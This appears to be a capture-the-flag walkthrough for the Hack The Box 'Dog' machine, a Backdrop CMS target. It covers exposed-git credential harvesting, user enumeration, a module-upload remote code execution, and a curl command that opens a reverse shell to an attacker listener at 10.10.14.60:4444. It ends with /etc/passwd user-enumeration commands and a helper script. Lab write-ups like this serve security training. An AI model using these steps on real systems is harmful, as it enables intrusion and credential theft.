Dog machine
Footprinting
Run nmap. Visit the site and run dirb or dirsearch against it. Download the exposed git repository.
Hint: ffuf
Use Burp Suite to capture the password-reset request, save it to a file named login.txt and feed that file to ffuf (its -request option reads a raw HTTP request; replace the value of name with FUZZ and point -w at a username wordlist):
POST /?q=user/password HTTP/1.1
Host: 10.129.14.204
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://10.129.14.204
Connection: keep-alive
Referer: http://10.129.14.204/?q=user/password
Upgrade-Insecure-Requests: 1
Priority: u=0, i
name=root&form_build_id=form-l_7duj9H_Hs5SJ1uXh9p4u9Bcc82xtTympqVDkLa-LQ&form_id=user_pass&op=Reset+password
However, the requests get blocked, so user enumeration this way does not work.
Google backdropscan (on GitHub), fetch it and scan with it.
Find user information: use backdropscan to enumerate users.
The password turns up in settings.php inside the downloaded source code. Grep the dumped repository for references to htb to locate it:
grep -irl "htb"
Google the Backdrop version to find the CVE (module upload leading to remote code execution).
Create the shell module (a directory named shell containing shell.php; Backdrop also expects a shell.info file next to it before it will treat the directory as a module), then package it:
tar -czvf shell.tar.gz /shell
(tar strips the leading / so the members land under shell/, which is what the path /modules/shell/shell.php below relies on.) Upload the archive through the vulnerable module installer, start a listener on 10.10.14.60:4444, then trigger the reverse shell:
curl -G http://10.129.14.204/modules/shell/shell.php --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.14.60/4444 0>&1"'
Trick 2: /etc/passwd
List accounts that have an interactive shell, then keep only the usernames:
grep 'sh$' /etc/passwd
grep 'sh$' /etc/passwd | awk -F: '{print $1}'
ls -la /home
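The same enumeration as a reusable function, added here as an example rather than taken from the notes: it runs over a constructed passwd sample so it works offline (pass /etc/passwd and an empty prefix on a real host), keeps the 'sh$' match from the notes but drops git-shell, which also ends in sh yet is a restricted shell, and then reports which of those users have a home directory you can read, which is the part the ls -la /home step is really after.

```shell
#!/bin/sh
# Added example (not from the original notes). SAMPLE_PASSWD is constructed.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/sh
git:x:106:112:git:/var/lib/git:/usr/bin/git-shell'

login_users() {
  # $1 = passwd file. Prints user:uid:home:shell for interactive-shell accounts.
  # Same idea as grep 'sh$' | awk above; git-shell is excluded because it is
  # a restricted shell that only accepts git commands.
  awk -F: '$7 ~ /sh$/ && $7 !~ /git-shell$/ {print $1":"$3":"$6":"$7}' "$1"
}

readable_homes() {
  # $1 = passwd file, $2 = filesystem root prefix ("" on a live system).
  # Prints the users whose home directory exists and is readable by us.
  login_users "$1" | while IFS=: read -r user uid home shell; do
    if [ -r "$2$home" ]; then
      printf '%s\n' "$user"
    fi
  done
}

# Usage on a real host:
# login_users /etc/passwd
# readable_homes /etc/passwd ""
```

Users that appear in login_users but not in readable_homes are still worth noting: the account can log in, so a reused password from settings.php may work for them even when their home directory is locked down.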